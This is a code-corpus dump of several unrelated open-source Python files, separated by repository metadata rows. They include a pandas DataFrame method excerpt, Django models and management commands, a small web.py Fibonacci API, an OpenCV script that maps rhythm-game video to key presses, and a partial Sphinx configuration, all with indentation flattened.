This method is the DataFrame version of ``ndarray.argmin``.
See Also
--------
Series.idxmin
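Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df = pd.DataFrame({'a': [3, 1, 2], 'b': [30, 20, 10]})  # arbitrary example data
>>> df.idxmin()
a    1
b    2
dtype: int64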
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmin(self.values, axis=axis, skipna=skipna)
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return Series(result, index=self._get_agg_axis(axis))
def idxmax(self, axis=0, skipna=True):
"""
Return index of first occurrence of maximum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Raises
------
ValueError
* If the row/column is empty
Returns
-------
idxmax : Series
Notes
-----
This method is the DataFrame version of ``ndarray.argmax``.
See Also
--------
Series.idxmax
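Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df = pd.DataFrame({'a': [3, 1, 2], 'b': [30, 20, 10]})  # arbitrary example data
>>> df.idxmax()
a    0
b    0
dtype: int64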
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmax(self.values, axis=axis, skipna=skipna)
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return Series(result, index=self._get_agg_axis(axis))
def _get_agg_axis(self, axis_num):
""" let's be explicit about this """
if axis_num == 0:
return self.columns
elif axis_num == 1:
return self.index
else:
raise ValueError('Axis must be 0 or 1 (got %r)' % axis_num)
def mode(self, axis=0, numeric_only=False):
"""
Gets the mode(s) of each element along the axis selected. Adds a row
for each mode per label, fills in gaps with nan.
Note that there could be multiple values returned for the selected
axis (when more than one item share the maximum frequency), which is
the reason why a dataframe is returned. If you want to impute missing
values with the mode in a dataframe ``df``, you can just do this:
``df.fillna(df.mode().iloc[0])``
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
* 0 or 'index' : get mode of each column
* 1 or 'columns' : get mode of each row
numeric_only : boolean, default False
if True, only apply to numeric columns
Returns
-------
modes : DataFrame (sorted)
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 1, 2, 1, 2, 3]})
>>> df.mode()
A
0 1
1 2
"""
data = self if not numeric_only else self._get_numeric_data()
def f(s):
return s.mode()
return data.apply(f, axis=axis)
def quantile(self, q=0.5, axis=0, numeric_only=True,
interpolation='linear'):
"""
Return values at the given quantile over requested axis, a la
numpy.percentile.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
0 <= q <= 1, the quantile(s) to compute
axis : {0, 1, 'index', 'columns'} (default 0)
0 or 'index' for row-wise, 1 or 'columns' for column-wise
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
.. versionadded:: 0.18.0
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
quantiles : Series or DataFrame
- If ``q`` is an array, a DataFrame will be returned where the
index is ``q``, the columns are the columns of self, and the
values are the quantiles.
- If ``q`` is a float, a Series will be returned where the
index is the columns of self and the values are the quantiles.
Examples
--------
>>> df = pd.DataFrame(np.array([[1, 1], [2, 10], [3, 100], [4, 100]]),
...                   columns=['a', 'b'])
>>> df.quantile(.1)
a 1.3
b 3.7
dtype: float64
>>> df.quantile([.1, .5])
a b
0.1 1.3 3.7
0.5 2.5 55.0
"""
self._check_percentile(q)
data = self._get_numeric_data() if numeric_only else self
axis = self._get_axis_number(axis)
is_transposed = axis == 1
if is_transposed:
data = data.T
result = data._data.quantile(qs=q,
axis=1,
interpolation=interpolation,
transposed=is_transposed)
if result.ndim == 2:
result = self._constructor(result)
else:
result = self._constructor_sliced(result, name=q)
if is_transposed:
result = result.T
return result
def to_timestamp(self, freq=None, how='start', axis=0, copy=True):
"""
Cast to DatetimeIndex of timestamps, at *beginning* of period
Parameters
----------
freq : string, default frequency of PeriodIndex
Desired frequency
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default)
copy : boolean, default True
If false then underlying input data is not copied
Returns
-------
df : DataFrame with DatetimeIndex
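Examples
--------
A small, illustrative sketch (the index below is arbitrary):
>>> idx = pd.period_range('2017-01', periods=2, freq='M')  # arbitrary example index
>>> df = pd.DataFrame({'v': [1, 2]}, index=idx)
>>> df.to_timestamp().index
DatetimeIndex(['2017-01-01', '2017-02-01'], dtype='datetime64[ns]', freq='MS')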
"""
new_data = self._data
if copy:
new_data = new_data.copy()
axis = self._get_axis_number(axis)
if axis == 0:
new_data.set_axis(1, self.index.to_timestamp(freq=freq, how=how))
elif axis == 1:
new_data.set_axis(0, self.columns.to_timestamp(freq=freq, how=how))
else: # pragma: no cover
raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
return self._constructor(new_data)
def to_period(self, freq=None, axis=0, copy=True):
"""
Convert DataFrame from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed)
Parameters
----------
freq : string, default
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default)
copy : boolean, default True
If False then underlying input data is not copied
Returns
-------
df : DataFrame with PeriodIndex
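Examples
--------
A small, illustrative sketch (the index below is arbitrary):
>>> idx = pd.date_range('2017-01-01', periods=2, freq='MS')  # arbitrary example index
>>> df = pd.DataFrame({'v': [1, 2]}, index=idx)
>>> df.to_period('M').index
PeriodIndex(['2017-01', '2017-02'], dtype='period[M]', freq='M')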
"""
new_data = self._data
if copy:
new_data = new_data.copy()
axis = self._get_axis_number(axis)
if axis == 0:
new_data.set_axis(1, self.index.to_period(freq=freq))
elif axis == 1:
new_data.set_axis(0, self.columns.to_period(freq=freq))
else: # pragma: no cover
raise AssertionError('Axis must be 0 or 1. Got %s' % str(axis))
return self._constructor(new_data)
def isin(self, values):
"""
Return boolean DataFrame showing whether each element in the
DataFrame is contained in values.
Parameters
----------
values : iterable, Series, DataFrame or dictionary
The result will only be true at a location if all the
labels match. If `values` is a Series, that's the index. If
`values` is a dictionary, the keys must be the column names,
which must match. If `values` is a DataFrame,
then both the index and column labels must match.
Returns
-------
DataFrame of booleans
Examples
--------
When ``values`` is a list:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
>>> df.isin([1, 3, 12, 'a'])
A B
0 True True
1 False False
2 True False
When ``values`` is a dict:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 4, 7]})
>>> df.isin({'A': [1, 3], 'B': [4, 7, 12]})
A B
0 True False # Note that B didn't match the 1 here.
1 False True
2 True True
When ``values`` is a Series or DataFrame:
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': ['a', 'b', 'f']})
>>> other = DataFrame({'A': [1, 3, 3, 2], 'B': ['e', 'f', 'f', 'e']})
>>> df.isin(other)
A B
0 True False
1 False False # Column A in `other` has a 3, but not at index 1.
2 True True
"""
if isinstance(values, dict):
from pandas.core.reshape.concat import concat
values = collections.defaultdict(list, values)
return concat((self.iloc[:, [i]].isin(values[col])
for i, col in enumerate(self.columns)), axis=1)
elif isinstance(values, Series):
if not values.index.is_unique:
raise ValueError("cannot compute isin with "
"a duplicate axis.")
return self.eq(values.reindex_like(self), axis='index')
elif isinstance(values, DataFrame):
if not (values.columns.is_unique and values.index.is_unique):
raise ValueError("cannot compute isin with "
"a duplicate axis.")
return self.eq(values.reindex_like(self))
else:
if not is_list_like(values):
raise TypeError("only list-like or dict-like objects are "
"allowed to be passed to DataFrame.isin(), "
"you passed a "
"{0!r}".format(type(values).__name__))
return DataFrame(
algorithms.isin(self.values.ravel(),
values).reshape(self.shape), self.index,
self.columns)
# ----------------------------------------------------------------------
# Add plotting methods to DataFrame
plot = accessor.AccessorProperty(gfx.FramePlotMethods,
gfx.FramePlotMethods)
hist = gfx.hist_frame
boxplot = gfx.boxplot_frame
DataFrame._setup_axes(['index', 'columns'], info_axis=1, stat_axis=0,
axes_are_reversed=True, aliases={'rows': 0})
DataFrame._add_numeric_operations()
DataFrame._add_series_or_dataframe_operations()
ops.add_flex_arithmetic_methods(DataFrame, **ops.frame_flex_funcs)
ops.add_special_arithmetic_methods(DataFrame, **ops.frame_special_funcs)
def _arrays_to_mgr(arrays, arr_names, index, columns, dtype=None):
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
# figure out the index, if necessary
if index is None:
index = extract_index(arrays)
else:
index = _ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
# from BlockManager perspective
axes = [_ensure_index(columns), _ensure_index(index)]
return create_block_manager_from_arrays(arrays, arr_names, axes)
def extract_index(data):
from pandas.core.index import _union_indexes
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
indexes = []
have_raw_arrays = False
have_series = False
have_dicts = False
for v in data:
if isinstance(v, Series):
have_series = True
indexes.append(v.index)
elif isinstance(v, dict):
have_dicts = True
indexes.append(list(v.keys()))
elif is_list_like(v) and getattr(v, 'ndim', 1) == 1:
have_raw_arrays = True
raw_lengths.append(len(v))
if not indexes and not raw_lengths:
raise ValueError('If using all scalar values, you must pass'
' an index')
if have_series or have_dicts:
index = _union_indexes(indexes)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('arrays must all be same length')
if have_dicts:
raise ValueError('Mixing dicts with non-Series may lead to '
'ambiguous ordering.')
if have_series:
if lengths[0] != len(index):
msg = ('array length %d does not match index length %d' %
(lengths[0], len(index)))
raise ValueError(msg)
else:
index = _default_index(lengths[0])
return _ensure_index(index)
def _prep_ndarray(values, copy=True):
if not isinstance(values, (np.ndarray, Series, Index)):
if len(values) == 0:
return np.empty((0, 0), dtype=object)
def convert(v):
return maybe_convert_platform(v)
# we could have a 1-dim or 2-dim list here
# this is equiv of np.asarray, but does object conversion
# and platform dtype preservation
try:
if is_list_like(values[0]) or hasattr(values[0], 'len'):
values = np.array([convert(v) for v in values])
else:
values = convert(values)
except:
values = convert(values)
else:
# drop subclass info, do not copy data
values = np.asarray(values)
if copy:
values = values.copy()
if values.ndim == 1:
values = values.reshape((values.shape[0], 1))
elif values.ndim != 2:
raise ValueError('Must pass 2-d input')
return values
def _to_arrays(data, columns, coerce_float=False, dtype=None):
"""
Return list of arrays, columns
"""
if isinstance(data, DataFrame):
if columns is not None:
arrays = [data._ixs(i, axis=1).values
for i, col in enumerate(data.columns) if col in columns]
else:
columns = data.columns
arrays = [data._ixs(i, axis=1).values for i in range(len(columns))]
return arrays, columns
if not len(data):
if isinstance(data, np.ndarray):
columns = data.dtype.names
if columns is not None:
return [[]] * len(columns), columns
return [], [] # columns if columns is not None else []
if isinstance(data[0], (list, tuple)):
return _list_to_arrays(data, columns, coerce_float=coerce_float,
dtype=dtype)
elif isinstance(data[0], collections.Mapping):
return _list_of_dict_to_arrays(data, columns,
coerce_float=coerce_float, dtype=dtype)
elif isinstance(data[0], Series):
return _list_of_series_to_arrays(data, columns,
coerce_float=coerce_float,
dtype=dtype)
elif isinstance(data[0], Categorical):
if columns is None:
columns = _default_index(len(data))
return data, columns
elif (isinstance(data, (np.ndarray, Series, Index)) and
data.dtype.names is not None):
columns = list(data.dtype.names)
arrays = [data[k] for k in columns]
return arrays, columns
else:
# last ditch effort
data = lmap(tuple, data)
return _list_to_arrays(data, columns, coerce_float=coerce_float,
dtype=dtype)
def _masked_rec_array_to_mgr(data, index, columns, dtype, copy):
""" extract from a masked rec array and create the manager """
# essentially process a record array then fill it
fill_value = data.fill_value
fdata = ma.getdata(data)
if index is None:
index = _get_names_from_index(fdata)
if index is None:
index = _default_index(len(data))
index = _ensure_index(index)
if columns is not None:
columns = _ensure_index(columns)
arrays, arr_columns = _to_arrays(fdata, columns)
# fill if needed
new_arrays = []
for fv, arr, col in zip(fill_value, arrays, arr_columns):
mask = ma.getmaskarray(data[col])
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
# create the manager
arrays, arr_columns = _reorder_arrays(new_arrays, arr_columns, columns)
if columns is None:
columns = arr_columns
mgr = _arrays_to_mgr(arrays, arr_columns, index, columns)
if copy:
mgr = mgr.copy()
return mgr
def _reorder_arrays(arrays, arr_columns, columns):
# reorder according to the columns
if (columns is not None and len(columns) and arr_columns is not None and
len(arr_columns)):
indexer = _ensure_index(arr_columns).get_indexer(columns)
arr_columns = _ensure_index([arr_columns[i] for i in indexer])
arrays = [arrays[i] for i in indexer]
return arrays, arr_columns
def _list_to_arrays(data, columns, coerce_float=False, dtype=None):
if len(data) > 0 and isinstance(data[0], tuple):
content = list(lib.to_object_array_tuples(data).T)
else:
# list of lists
content = list(lib.to_object_array(data).T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
def _list_of_series_to_arrays(data, columns, coerce_float=False, dtype=None):
from pandas.core.index import _get_objs_combined_axis
if columns is None:
columns = _get_objs_combined_axis(data)
indexer_cache = {}
aligned_values = []
for s in data:
index = getattr(s, 'index', None)
if index is None:
index = _default_index(len(s))
if id(index) in indexer_cache:
indexer = indexer_cache[id(index)]
else:
indexer = indexer_cache[id(index)] = index.get_indexer(columns)
values = _values_from_object(s)
aligned_values.append(algorithms.take_1d(values, indexer))
values = np.vstack(aligned_values)
if values.dtype == np.object_:
content = list(values.T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
else:
return values.T, columns
def _list_of_dict_to_arrays(data, columns, coerce_float=False, dtype=None):
if columns is None:
gen = (list(x.keys()) for x in data)
sort = not any(isinstance(d, OrderedDict) for d in data)
columns = lib.fast_unique_multiple_list_gen(gen, sort=sort)
# assure that they are of the base dict class and not of derived
# classes
data = [(type(d) is dict) and d or dict(d) for d in data]
content = list(lib.dicts_to_array(data, list(columns)).T)
return _convert_object_array(content, columns, dtype=dtype,
coerce_float=coerce_float)
def _convert_object_array(content, columns, coerce_float=False, dtype=None):
if columns is None:
columns = _default_index(len(content))
else:
if len(columns) != len(content): # pragma: no cover
# caller's responsibility to check for this...
raise AssertionError('%d columns passed, passed data had %s '
'columns' % (len(columns), len(content)))
# provide soft conversion of object dtypes
def convert(arr):
if dtype != object and dtype != np.object:
arr = lib.maybe_convert_objects(arr, try_float=coerce_float)
arr = maybe_cast_to_datetime(arr, dtype)
return arr
arrays = [convert(arr) for arr in content]
return arrays, columns
def _get_names_from_index(data):
has_some_name = any(getattr(s, 'name', None) is not None for s in data)
if not has_some_name:
return _default_index(len(data))
index = lrange(len(data))
count = 0
for i, s in enumerate(data):
n = getattr(s, 'name', None)
if n is not None:
index[i] = n
else:
index[i] = 'Unnamed %d' % count
count += 1
return index
def _homogenize(data, index, dtype=None):
from pandas.core.series import _sanitize_array
oindex = None
homogenized = []
for v in data:
if isinstance(v, Series):
if dtype is not None:
v = v.astype(dtype)
if v.index is not index:
# Forces alignment. No need to copy data since we
# are putting it into an ndarray later
v = v.reindex(index, copy=False)
else:
if isinstance(v, dict):
if oindex is None:
oindex = index.astype('O')
if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
v = _dict_compat(v)
else:
v = dict(v)
v = lib.fast_multiget(v, oindex.values, default=np.nan)
v = _sanitize_array(v, index, dtype=dtype, copy=False,
raise_cast_failure=False)
homogenized.append(v)
return homogenized
def _from_nested_dict(data):
# TODO: this should be seriously cythonized
new_data = OrderedDict()
for index, s in compat.iteritems(data):
for col, v in compat.iteritems(s):
new_data[col] = new_data.get(col, OrderedDict())
new_data[col][index] = v
return new_data
def _put_str(s, space):
return ('%s' % s)[:space].ljust(space)
| bsd-3-clause | 7,829,162,651,239,753,000 | 35.73283 | 85 | 0.523551 | false |
martijnvermaat/rpclib | src/rpclib/test/interop/server/httprpc_csv_basic.py | 1 | 1859 | #!/usr/bin/env python
#
# rpclib - Copyright (C) Rpclib contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
import logging
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('rpclib.protocol.xml')
logger.setLevel(logging.DEBUG)
from rpclib.application import Application
from rpclib.interface.wsdl import Wsdl11
from rpclib.protocol.csv import OutCsv
from rpclib.protocol.http import HttpRpc
from rpclib.server.wsgi import WsgiApplication
from rpclib.test.interop.server._service import services
httprpc_csv_application = Application(services,
'rpclib.test.interop.server.httprpc.csv', HttpRpc(), OutCsv(), Wsdl11())
if __name__ == '__main__':
try:
from wsgiref.simple_server import make_server
from wsgiref.validate import validator
wsgi_application = WsgiApplication(httprpc_csv_application)
server = make_server('0.0.0.0', 9755, validator(wsgi_application))
logger.info('Starting interop server at %s:%s.' % ('0.0.0.0', 9755))
logger.info('WSDL is at: /?wsdl')
server.serve_forever()
except ImportError:
print("Error: example server code requires Python >= 2.5")
| lgpl-2.1 | -6,483,269,929,289,989,000 | 37.729167 | 80 | 0.737493 | false |
pi2-picole/api | vendor/models.py | 1 | 3896 | from django.db import models
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.core.validators import MinValueValidator
@receiver(post_save, sender=User)
def create_auth_token(sender, instance=None, created=False, **kwargs):
if created:
Token.objects.create(user=instance)
# Create your models here.
class Popsicle(models.Model):
flavor = models.CharField(max_length=25, default="", unique=True)
price = models.CharField(max_length=4, default='100')
is_active = models.BooleanField(default=True)
def __str__(self):
return "{}".format(self.flavor)
class Machine(models.Model):
is_active = models.BooleanField(default=True)
label = models.CharField(max_length=25, default="")
seller = models.ForeignKey(User, related_name='machines', null=True)
def __str__(self):
return "{}'s machine: #{} {}".format(self.label, self.id, self.locations.last())
class Location(models.Model):
lat = models.CharField(max_length=15, default="")
lng = models.CharField(max_length=15, default="")
machine = models.ForeignKey(
Machine,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True},
related_name="locations"
)
updated_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return "(lat:{},lng:{}) at {}".format(self.lat, self.lng, self.updated_at)
class Stock(models.Model):
popsicle = models.ForeignKey(
Popsicle,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True}
)
amount = models.PositiveSmallIntegerField(default=0)
machine = models.ForeignKey(
Machine,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True},
related_name="stocks"
)
updated_at = models.DateField(auto_now=True)
class Transaction(models.Model):
class Meta:
abstract = True
popsicle = models.ForeignKey(
Popsicle,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True}
)
amount = models.PositiveSmallIntegerField(
default=0, validators=[MinValueValidator(1)]
)
machine = models.ForeignKey(
Machine,
on_delete=models.DO_NOTHING,
limit_choices_to={'is_active': True}
)
timestamp = models.DateTimeField(auto_now_add=True)
class Purchase(Transaction):
lid_was_released = models.BooleanField(default=False)
class PopsicleEntry(Transaction):
pass
class PopsicleRemoval(Transaction):
pass
@receiver(post_save, sender=Purchase)
@receiver(post_save, sender=PopsicleRemoval)
def remove_from_stock(sender, instance, created, **kwargs):
if created:
stock = Stock.objects.get(
popsicle=instance.popsicle, machine=instance.machine
)
stock.amount -= instance.amount
stock.save()
@receiver(post_save, sender=PopsicleEntry)
def add_to_stock(sender, instance, created, **kwargs):
if created:
stock = Stock.objects.get(
popsicle=instance.popsicle, machine=instance.machine
)
stock.amount += instance.amount
stock.save()
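# --- Illustrative sketch added by the editor (not part of the original app):
# because of the post_save receivers above, recording transactions is enough to
# keep Stock in sync. 'machine' and 'popsicle' are assumed to be saved instances.
def _example_stock_flow(machine, popsicle):
    PopsicleEntry.objects.create(machine=machine, popsicle=popsicle, amount=10)
    Purchase.objects.create(machine=machine, popsicle=popsicle, amount=2)
    # 10 added minus 2 sold leaves 8 in stock for this machine/popsicle pair
    return Stock.objects.get(machine=machine, popsicle=popsicle).amount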
@receiver(post_save, sender=Machine)
def create_stocks_for_machine(sender, instance, created, **kwargs):
if created:
stocks = []
for pop in Popsicle.objects.all():
stocks.append(Stock(machine=instance, popsicle=pop, amount=0))
Stock.objects.bulk_create(stocks)
@receiver(post_save, sender=Popsicle)
def create_stocks_for_popsicle(sender, instance, created, **kwargs):
if created:
stocks = []
for machine in Machine.objects.all():
stocks.append(Stock(machine=machine, popsicle=instance, amount=0))
Stock.objects.bulk_create(stocks)
| mit | -7,058,885,298,412,033,000 | 29.677165 | 88 | 0.667608 | false |
priestc/MultiExplorer | local_settings_default.py | 1 | 1056 | # Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
'TIMEOUT': 500000,
}
}
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
WALLET_SUPPORTED_CRYPTOS = []
WALLET_SUPPORTED_FIATS = ['usd', 'eur', 'cny', 'jpy', 'idr', 'cad', 'gbp']
EXCHANGE_KICK_INTERVAL_MINUTES = 10
EXCHANGE_FEE_PERCENTAGE = 1.5
MAX_MEMO_SIZE_BYTES = 1000
MEMO_SERVER_PRIVATE_MODE = False
MEMO_SERVER_PULL = [
'https://multiexplorer.com/memo/pull'
]
MEMO_SERVER_PUSH = [
'https://multiexplorer.com/memo'
]
DEBUG = False
LOGIN_TRIES = 5
ALLOWED_HOSTS = []
PRICE_INTERVAL_SECONDS = 500
QUANDL_APIKEY = None
IP_FILTER_INTERVAL = {'minutes': 5}
IP_FILTER_HITS = 25
| mit | 1,227,060,583,103,808,500 | 21.956522 | 74 | 0.648674 | false |
erben22/fib | fibserver.py | 1 | 1239 | """Implementation of a web server API that serves up Fibonacci numbers.
TODO: Add some additional error handling:
- Need some handling around the query parameter on the
API. What if it is not supplied for example?
"""
import web
from fibonacci import Fibonacci
urls = (
'/fibonacci', 'FibonacciHandler'
)
"""Definition of the API endpoint to HTTP handler class."""
class FibonacciHandler:
"""Fibonacci endpoint handler. Will expect a parameter to be present
    for the sequence to calculate, and if present, will create an
instance of our Fibonacci class to calculate the value and return
it to the caller.
"""
def GET(self):
"""Implementation of the GET handler interface."""
try:
desired_sequence = int(web.input().desired_sequence)
fibonacci = Fibonacci(desired_sequence)
return fibonacci.calculate()
except:
raise web.HTTPError('400 Bad Request', {})
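# --- Editor's note (illustrative, not part of the original file): with the
# server running on web.py's default port 8080, a request such as
#   curl "http://localhost:8080/fibonacci?desired_sequence=10"
# returns the 10th Fibonacci number, while a missing or non-integer
# desired_sequence parameter falls into the except branch above and is
# answered with 400 Bad Request.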
if __name__ == "__main__":
"""Main method that fires up the web application and listens for
prospective requests from various clients.
"""
web.config.debug = False
app = web.application(urls, globals())
app.run()
| mit | -1,917,998,892,817,449,200 | 28.5 | 73 | 0.652139 | false |
esteluk/reinhardt | memberinfo/management/commands/populate.py | 2 | 3209 | import settings
from django.core.management.base import NoArgsCommand
from django.contrib.auth.models import User
from compsoc.memberinfo.models import *
from compsoc.events.models import *
from datetime import date
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list
help = "Populates some simple data into the database"
requires_model_validation = True
def handle_noargs(self, **options):
'''
Inserts the following data into the database:
Terms
Sample Event Types
Sample Locations
Sample Events
Assumes:
syncdb has been run, and there is a user
'''
#u = User.objects.all()[0]
#try:
#mem = Member(user=u,showDetails=True,guest=False)
#mem.save()
#except: pass #user already has member object
# sort of broken :p
#lists = ['announce','discuss','exec','gaming','jobs','socials','techteam']
#for suffix in lists:
#u.mailinglist_set.create(list='compsoc-'+suffix+'@uwcs.co.uk')
terms = [
# from http://www2.warwick.ac.uk/study/termdates/
# 2007/2008
('AU',1,date(2007,10,01)),
('SP',11,date(2008,1,07)),
('SU',21,date(2008,4,21)),
# 2008/2009
('AU',1,date(2008,9,29)),
('SP',11,date(2009,1,5)),
('SU',21,date(2009,4,20)),
# 2009/2010
('AU',1,date(2009,10,5)),
('SP',11,date(2010,1,11)),
('SU',21,date(2010,4,26)),
# 2010/2011
('AU',1,date(2010,10,4)),
('SP',11,date(2011,1,10)),
('SU',21,date(2011,4,27)),
# 2011/2012
('AU',1,date(2011,10,3)),
('SP',11,date(2012,1,9)),
('SU',21,date(2012,4,23)),
# 2012/2013
('AU',1,date(2012,10,1)),
('SP',11,date(2013,1,7)),
('SU',21,date(2013,4,22)),
# 2013/2014
('AU',1,date(2013,9,30)),
('SP',11,date(2014,1,6)),
('SU',21,date(2014,4,23)),
]
for (t,num,d) in terms:
term = Term(start_date=d,start_number=num,length=10,which=t)
term.save()
#for yr in range(2001,2009):
#u.memberjoin_set.create(year=yr)
#is this necessary?
#u.save()
# Event Types
event_types = [
{"name":"LAN Party", "info":"Weekend long sweat off.", "target":"GAM"},
{"name":"Pub Social", "info":"Pub food with CompSoc.", "target":"SCL"},
{"name":"Exec Meeting", "info":"Weekly meeting to discuss stuff.", "target":"SCT"},
]
for et in event_types:
EventType.objects.create(**et)
# locations
locations = [
{"name":"Lib2", "description":"Next to the Cafe Library"},
{"name":"The Phantom Coach", "description":"Up the road from tescos. Nice pub!"},
{"name":"DCS Undergrad Labs", "description":"The building next to the Zeeman building."},
]
for l in locations:
Location.objects.create(**l)
| agpl-3.0 | 7,771,329,610,080,966,000 | 31.414141 | 101 | 0.511374 | false |
McMaNGOS/IIDXCV | IIDXCV_video.py | 1 | 3111 | from imutils.video import FileVideoStream
from pykeyboard import PyKeyboard
import cv2
import numpy as np
import argparse
import imutils
import time
# argument parser (for video, will use stream/live frames in future)
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", required=True,
help="Path to video file")
args = vars(ap.parse_args())
# start threaded video stream, give buffer time to fill
print("Initializing video stream...")
fvs = FileVideoStream(args["video"]).start()
time.sleep(1.0)
# class for constructing key objects
class Key:
'Data for each key (detection pixel x/y location, name)'
def __init__(self, x, y, name, keyButton):
# x and y axis of pixel to check for
self.x = x
self.y = y
# name of key (to print in console)
self.name = name
# keyboard button to press
self.keyButton = keyButton
# presses and holds input key, adds key to array
def pressKey(key, pressedArray):
keyboard.press_key(key.keyButton)
pressedArray.append(key)
# releases input key, removes key from array
def releaseKey(key, pressedArray):
keyboard.release_key(key.keyButton)
pressedArray.remove(key)
# define keys (8 for IIDX-style games)
scratch = Key(16, 99, "SCRATCH", 'X')
key1 = Key(70, 99, "KEY 1", 'C')
key2 = Key(104, 99, "KEY 2", 'F')
key3 = Key(135, 99, "KEY 3", 'V')
key4 = Key(169, 99, "KEY 4", 'G')
key5 = Key(199, 99, "KEY 5", 'B')
key6 = Key(232, 99, "KEY 6", 'H')
key7 = Key(263, 99, "KEY 7", 'N')
# put keys in array
keyArray = [scratch, key1, key2, key3, key4, key5, key6, key7]
# initialize keyboard
keyboard = PyKeyboard()
# create background subtractor
bgSub = cv2.createBackgroundSubtractorMOG2()
# array for checking which keys were pressed on a frame
keysPressed = []
# loop over frames from the video file stream
while fvs.more():
# grab current frame from video stream
frame = fvs.read()
# crop the grabbed frame
cropped_frame = frame[0:100, 49:336]
# old crop value (for whole note field):
# cropped_frame = frame[0:484, 49:336]
# apply mask to frame
mask = bgSub.apply(cropped_frame)
# keys to print (underscores by default, for readability) [for debugging]
# printArray = ['_______', '_____', '_____', '_____', '_____', '_____', '_____', '_____']
# initialPrintArray = printArray
# loop through keys in array
for idx, Key in enumerate(keyArray):
# detect pixel at given coordinates
pixel = mask[Key.y, Key.x]
# if white pixel found, pressKey
if pixel == 255 and Key not in keysPressed:
pressKey(Key, keysPressed)
# printArray[idx] = Key.name
# if white pixel not found & key is in keysPressed, releaseKey
if pixel != 255 and Key in keysPressed:
releaseKey(Key, keysPressed)
# print if array is different from default (= key detected)
# if printArray != initialPrintArray:
# print printArray
# display frame with mask
cv2.imshow("output", mask)
cv2.waitKey(1)
# cleanup
cv2.destroyAllWindows()
fvs.stop()
| gpl-3.0 | -3,277,442,641,834,810,000 | 26.776786 | 93 | 0.647702 | false |
bozzzzo/quark | quarkc/test/emit/expected/py/no-spurious-cast/docs/conf.py | 1 | 1059 | # -*- coding: utf-8 -*-
#
# no_spurious_cast documentation build configuration file, created by Quark
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon'
]
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'no_spurious_cast'
copyright = u'2015, no_spurious_cast authors'
author = u'no_spurious_cast authors'
version = '0.0.1'
release = '0.0.1'
language = None
exclude_patterns = ['_build']
pygments_style = 'sphinx'
todo_include_todos = False
html_theme = 'alabaster'
html_static_path = ['_static']
htmlhelp_basename = 'no_spurious_castdoc'
latex_elements = {}
latex_documents = [
(master_doc, 'no_spurious_cast.tex', u'no_spurious_cast Documentation',
u'no_spurious_cast authors', 'manual'),
]
man_pages = [
(master_doc, 'no_spurious_cast', u'no_spurious_cast Documentation',
[author], 1)
]
texinfo_documents = [
(master_doc, 'no_spurious_cast', u'no_spurious_cast Documentation',
